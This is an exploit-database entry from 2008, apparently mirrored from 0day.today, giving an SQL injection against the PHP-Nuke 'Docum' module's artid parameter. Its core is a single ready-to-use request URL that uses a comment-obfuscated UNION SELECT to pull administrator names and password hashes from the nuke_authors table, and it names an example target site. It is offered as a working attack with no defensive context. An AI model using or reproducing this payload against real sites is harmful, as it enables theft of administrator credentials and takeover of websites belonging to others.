PHP-Nuke Module Docum (artid) SQL Injection Vulnerability

2008-02-20T00:00:00
ID 1337DAY-ID-2672
Type zdt
Reporter DamaR
Modified 2008-02-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
PHP-Nuke Module Docum (artid) SQL Injection Vulnerability
=========================================================



#########################################################################

           php-nuke modules Docum remote sql inj
#########################################################################

Found:DamaR

Hack Bitti ama Donmek Yak?n  Since 2000
-------------------------------------------------------------------------------


/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2

#########################################################################
Example: http://www.xxx.com.ar/mt/




#  0day.today [2018-02-16]  #